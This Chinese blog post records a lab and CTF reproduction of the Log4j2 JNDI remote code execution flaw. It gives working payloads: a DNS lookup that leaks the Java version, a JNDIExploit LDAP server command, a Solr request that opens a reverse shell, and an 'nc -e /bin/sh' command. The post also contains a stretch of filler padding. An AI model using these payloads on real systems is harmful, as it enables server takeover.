记一次Log4j2命令执行漏洞复现

admin 2024年2月19日13:59:13评论9 views字数 837阅读2分47秒阅读模式

前言:好久之前都想复现下这个著名的漏洞了,但复现之后好像还没完全理解,等实战遇到了再说吧。。

Vulhub靶场

靶机:192.168.234.193

中转机:192.168.234.1  (jdk1.80)

攻击机:192.168.234.129

构造下获取版本号的请求

${jndi:dns://${sys:java.version}.7578feaa.dns.whitehat.asia.}

记一次Log4j2命令执行漏洞复现

反弹shell则需要在中转机上启动一个LDAP服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.234.1

记一次Log4j2命令执行漏洞复现

然后去访问

/solr/admin/cores?action=${jndi:ldap://192.168.234.1:1389/Basic/ReverseShell/192.168.234.129/6666}

记一次Log4j2命令执行漏洞复现

Apache Log4j2 RCE (Bugku)

这里使用Log4j2Scan插件来对其进行检测,这里应用为Dnslog检测

记一次Log4j2命令执行漏洞复现

发送到插件进行主动扫描

记一次Log4j2命令执行漏洞复现

发现了一堆打到平台的记录,漏洞存在。

记一次Log4j2命令执行漏洞复现

${jndi:dns://${sys:java.version}.7578feaa.dns.whitehat.asia.}

记一次Log4j2命令执行漏洞复现

使用JNDI注入工具起一个LDAP服务,在监听一下6666端口

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 47.115.221.17

记一次Log4j2命令执行漏洞复现

将反弹shell的命令进行base64加密加密后填入Base64部分。

nc x.x.x.x 12345 -e /bin/sh${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64

记一次Log4j2命令执行漏洞复现

凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字

原文始发于微信公众号(飞奔的狸花猫):记一次Log4j2命令执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月19日13:59:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次Log4j2命令执行漏洞复现http://cn-sec.com/archives/2491327.html

发表评论

匿名网友 填写信息